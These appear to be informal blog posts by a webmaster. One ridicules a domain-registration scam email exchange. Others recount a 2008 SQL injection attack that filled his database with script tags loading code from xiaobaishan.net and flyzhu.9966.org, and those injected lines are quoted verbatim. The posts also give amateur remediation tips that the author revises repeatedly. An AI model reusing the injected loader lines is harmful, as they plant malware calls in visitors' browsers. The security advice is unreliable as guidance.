Oh deary me.  Seems I’m the latest one to get hit with the china domain name scam.  Haven’t heard of it?  Oh, this is a cool one.  You don’t have to take my word for it, it’s been going on all over the place.

You see, this nice domain name registrar company in China has noticed that one of their customers is trying to register YOUR domain!  And, to make things even worse, they are trying to register your Intellectual Property Rights as well!  Well, this gosh by golly good ol Chinese Domain Name Registrar has decided to do the right thing and contact you so you can avoid this whole mess!  They will allow you to head off this nefarious domainer at the pass and register the domains with them on your behalf.

What a cool company huh?  They’ll be happy to send you a list of all the domain names this international terrorist mastermind has given them to register, along with their special “you almost got robbed but we are here to save you” rates so they can  register it for you!

Wow, bestweb-service.net is great ain’t they.

It works like this.  They start going through the Internets, and find your domain.  How?  How’d you find this site?  They just did, trust me on this one.  Then they check of possible combination’s of your domain name, but ending in different tld’s, that are available, then hit you with a scary letter that sounds like this

Dear CEO&Principal,

We are a professional Internet consultant organization in Asia, which mainly deal with the global companies’ domain name registration and internet intellectual property right protection. Currently, we have a pretty important issue needing to confirm with your company.

On Nov 26, 2008, we received an application formally, one company named “SUSNES Holdings Ltd.” wanted to applied for the Internet brand “badassdomain.com” and some domain names through our body.

During our preliminary investigation, we found that these domain names’ keyword and internet brand is identical with your trademark. I wonder whether you consigned SUSNES Holdings Ltd to register these domain names through us or not? Or is SUSNES Holdings Ltd your business partner or distributor in Asia? Currently, we have postponed this application of this company temporarily already. In order to deal with this issue better, please let the principal make a confirmation with me by telephone or email ASAP.

Best Regards,

Lydia

Auditing Department (HK)

Tel:     00852-95660496
00852-95660489
Fax:     00852-82261011
Mail:      lydia@bestweb-service.org
Web:     http://www.bestweb-service.net

Wow, how nice, so I took the bait to see what would happen, and I sent them this.

Lydia,

I have owned “badassdomain.com”, net and org since 2005-10-16, and have registered the brand as a Trade name.  So What exactly are you blathering about?

I have no idea who is SUSNES Holdings Ltd, they are not my business partners in any way, shape or form.  Wait, are those the guys I see hanging out at the local gin joint with a couple of hookers, a crack pipe, and a donkey with questionable underwear?  I mean, I don’t frequent these kind of establishments, but those fuckers owe me money.

Please feel free to contact me should you have any further questions.

Thank you.

Mr. Rumblepup
CEO&Principle&SuperHeavyweightChampionOfTheWorld
“badassdomain.com”

To which Lydia quickly and kindly responds:

Dear Mr. Rumblepup,

Have a nice Thanksgiving Day!  Thank you for your reply. If you have no relationship with them. According to our working experience, there are 2 possibilities:1.SUSNES company is a domain name investment company, they want to register these names before you and sell back to you to gain profits;2.It may be a commercial method, SUSNES company is consigned by your competitor to register, they are trying to replicate your idea and let your customers feel confusion.

We knew your company has registered the domain name “badassdomain.com” and own the intellectual property, this is why we informed you. But now SUSNES company do not want to register your trademark or domain name “badassdomain.com”, they wanted to apply for other domain names and internet brand you have not registered yet.

Following are all the domain names and internet brand which are submitted by SUSNES company:
1. Domain name
badassdomain.cn
badassdomain.com.cn
badassdomain.net.cn
badassdomain.org.cn
badassdomain.asia
badassdomain.hk
badassdomain.tw
badassdomain.biz
2. Internet brand
badassdomain

Because domain name takes open registration, this is international domain name registration principle. So SUSNES company has right to register it. As a domain name registrar, we have no right to stop their application. I think you must know some cases about the domain names grabbed by the third party,we also won’t want to see similar things happen.

As the company whose trademarks relate to the applied domain names, you will get the priority to register these domain names and internet brand. If you think these domian names are important to your company,we can send you a dispute application form and help you to register these domains within dispute period, this is a way to prevent domain name from grabbing. Of course, each company has their own idea. If you don’t think their registration will confuse your clients and harm your profits, you can give up. In order to proceed next step work better, please give me your decision as soon as possible.

Best regards,

Lydia

..

Now, you have to understand that at this point, it’s 4AM in the morning and I’m feeling a wee bit wicked.  I mean, this is just entertainment at this point, so I respond on more time.

Lydia,

I’m sorry, but I can’t understand a fuckin’ thing you have written.  Not only does this read like the wacky information you find on those Chinese Herbal Tea Diet Pills, like “the state of obesity is the fact of being too fat” (Ha, that one always gets me) but it’s also so incredibly eyeball socket grating as well.

I mean, what does ‘Thank you for your reply. If you have no relationship with them.‘ supposed to mean?   Are you thanking me for my reply as long as I don’t have a relationship with them, because if I do, then to hell with me?

‘According to our working experience’.  Wow, your working experience actually SPEAKS to you?  Mine hasn’t spoken to me since I went to work for Siegfried & Roy all those years ago, but that’s another story.

‘they are trying to replicate your idea and let your customers feel confusion.‘   Oh yeah?  Well what if my customers are not allowed to feel confusion huh?  I mean, I know the Chinese State pretty much controls everything over there, but over here in the US, the only people who control anything are the ones with the big tanks.

‘they wanted to apply for other domain names and internet brand you have not registered yet’ OHHH, is that all?  Go ahead and let them have those domains.  I’m good with that, cause none of my customers are in China, and you know, I own the .com and everybody knows that there are those Chinese Malware Sites and all.

‘As the company whose trademarks relate to the applied domain names, you will get the priority to register these domain names and internet brand.’ Now your just trying to make my head spin.

‘If you don’t think their registration will confuse your clients and harm your profits, you can give up.‘ NEVER, NEVER will I give up.  Don’t you understand, that this is my calling in life?

‘In order to proceed next step work better, please give me your decision as soon as possible.’ I mean really, What the Holy Hopin Horseshit is that?  Does that mean you want my next step better work, or are you warning me about a hole in the floor, and to be carefull where I work?  Or is that step?  What, do you think people in America can’t walk or something?

Ok, since you said please…here’s my decision.

Go away and take a course in ‘Using your brain to think – The Curly Method‘ and see if we can get some better communication going.

Yours Truly

Mr. Rumblepup

CEO&Principle&SuperDeluxeHamburger

badassdomian.com

I haven’t exactly gotten a call back yet.

Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I’m apt to say when I do a beat down, FUACATA.

Bye bye sql injection hacker.

Ok, the latest state of sql injection attacks have been a nightmare. We got hacked again, but this time, with a insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the text file here.

So look through your server logs for this code in the url with a GET statement. Have your coder or web programmer disallow all all of the elements being used in the statement.

I’ve been getting a lot of requests for information about how to patch this attack.  I’ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only “attempts” to find a vulnerability.

So I did some more research, and had a talk with Jess Coburn with Windows Hosting company Appliedi.net.  Although the attack seems like a Window vulnerability, because of the attempts to gain entry through typical Windows Vulnerabilities, it’s not.  The media file attempts where only PART of the attempts made.  Apparently this attack is either preempted or followed up by various attempts to gain entry.  On our site, it was not a sql injection in the url, but a search form where we had created that uses what’s called an “Enter Event.”  Quickly, most asp.net search forms eschew keyboard events in favor of click events that call javascript postbacks.  Meaning that if you have an asp.net search control on your website, a person has to click the search button instead of just hitting Enter.

Here lies the problem.  User’s hate hitting search buttons, but love hitting their enter key.  Enter events are easy to create programmatically, thus so many forums and blogs get spammed and hacked all of the time.  However, javascript postback’s, not so much.   So far, from the little I do know, it’s very difficult to program into a hack scan a postback because it does not do a post or get the way most sites do.

But back to the problem and some solutions.

1. Disallow all sql parameters in your form text fields.  There are plenty of tutorials on how to do this.
2. Read Jess’s blog, he has a TON of links to great source and a neat rollback sql function to fix these type of sql injections
3. Remove “Enter Events” from your asp and asp.net forms.  Your users are going to have to click on the button for now.
4. Did I mention go to Jess’s blog?
5. Check for your most recent database backup.  If the offending script does not appear, you’ll have clean code and timestamp as to when the last time your code was clean.
6. If you don’t do regular backups, start to get into the habit right NOW.  If you have to do a backup every 2 hours, then do it.  Keep copies online and off.  A reputable hosting company will allow you to make as many backups as you need.
7. Check your hosting company’s backup policy.  Appliedi.net backups data at least twice in a 24 hour period.
8. If you’re on a dedicated box, assign some space and memory to run sql backup jobs automatically.  I’m doing some research on best practices.
9. During the hack attempt, or event, have a BIG GLASS OF SCOTCH, RUM, OR LIQUOR OF YOUR OWN CHOOSING.  These things are not easy to get through, but you need to relax or you’ll never get through it.
10. Be better prepared.  Just like a hurricane or earthquake, have a disaster plan.

Hope this helps.

Updated from: The xiaobaishan bomb.

Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:

<script src=http://flyzhu.9966.org/us/Help.asp></script>

Tricky little fucker.

In fact, this hack is pretty well thought out. Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds. What happened?

This is a Windows vulnerability. What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder. They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.

UPDATE: I’ve got new info on this. It’s a pure sql injection hack.

Sneaky fucker.

Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn’t run it against our VPS yet.

UPDATE:  Yes they did.  Whoopsee.

So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.

Right now, there is a reported 10,000 sites affected by this hack.

It’s very rare that I get the inside scoop on a bomb hack, but this this time I’m one of the victims. Seems that some kind of sql injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.

As I’m checking for the night the site that I SEO, banler.com, I notice that it’s running slow a molasses. Can’t be cause it’s on a pretty powerful VPS server. But I notice that it’s waiting on some unknown script. I do a quick source check and I see that every single one of my navigational items has this freaky call in it,

<script src=http://www.xiaobaishan.net/dt/us/Help.asp></script>

My security mind goes into full effect and I jump into the server to check around. The codebase is compeletely clean. Nothing like that in there. Since my app is in asp.net, I know that code hacking is pretty difficult, as asp.net dll’s are obfusticated (messed up so only asp.net can understand it) so I know that’s not it.

Since it was my navigation that was hit, and my navigation is run from a SQL 2000 database, I jump into the database, start opening up tables and, as we say in my Cuban neighborhood, FUACATA! There you go, a shitload of this strange script call all through the database. I contact the database admin to see if they have a backup, and as of this writing, their working on it.

But it made me wonder who the heck was doing this. So I did a little search on Google, and I find this result.

UPDATE: 4080 sites hacked.

That’s right, about two thousand eight hundred websites four thousand and eighty affected as of right now. Who knows what it will be in the morning.

UPDATE 6/2/08: Checked with Yahoo and Live. Seems that number might be up to about 20,000. Xiaobaishan is aparently the name of a Volcano.

When I try to check out the site, nothing exists, so I’m thinking that this was some type of malware keyboard recorder, or some other fucked up hack. There are some pretty impressive sites in this result set, and some of these where hacked a few days ago, so I’m hoping that their webmasters and site administrators are catching this.

So far, all of the sites that have been hacked are asp or asp.net based sites. Now I know what your going to say, Windows tech and all of that, but asp.net has been famous for avoiding hack. This seems like a SQL 2000 hack. Someone must have been sniffing for the database connections and got them, then somehow gained control of the individual databases, and went to town insterting this code into everything they could find. Since a lot of database driven websites have their navigation dynamically generated from the database, blamo.

I’m not a security expert and certainly not a IP pack expert or any kind of tech expert, I can’t really comment on what happened and how to fix it. All I can say is I hate freakin hackers. I mean, this world is full of nefarious people of all shapes and sizes and cultures, but sometime I feel that we in the Search Industry ought to have some kind of defense, other than technical, that we can all work together on.

In any case, mister hacker, I can bestow a curse upon you the likes that the internet has ever seen before, where even the maker of “two girls one cup” would cringe at the ramifications of my hate filled bombastic flurry of verbal fire. But you know what? I’ve changed in the last few years, and I can only say this. Bless you man. I hope that whatever thrill this gave you or whatever benefits you think your going to get will make you happy for a short while. I’ve noticed that the universe dishes out much heavier Karma that what we throw at it, and the bad waves you’ve made today will someday return and affect your life personally. I hope for your sake its just a computer malfunction, or a credit card snafu. But in all honesty, the way I see it, when God wants you punished, it’s not a one day thing. You can’t just say “Ok, I’m sorry, I won’t do it again” and hope that everything will be ok. I know this because I’ve earned myself some karma justice in the past, and it comes hard and angry and lasts for years and years. Watch your health and your families health. Think about what you’ve done and I hope you learn something from it. I hope you learn that you are killing businesses, and people’s livelyhoods. I hope you learn that gains are little when compared to personal loss.

I hope you learn now before it’s too late.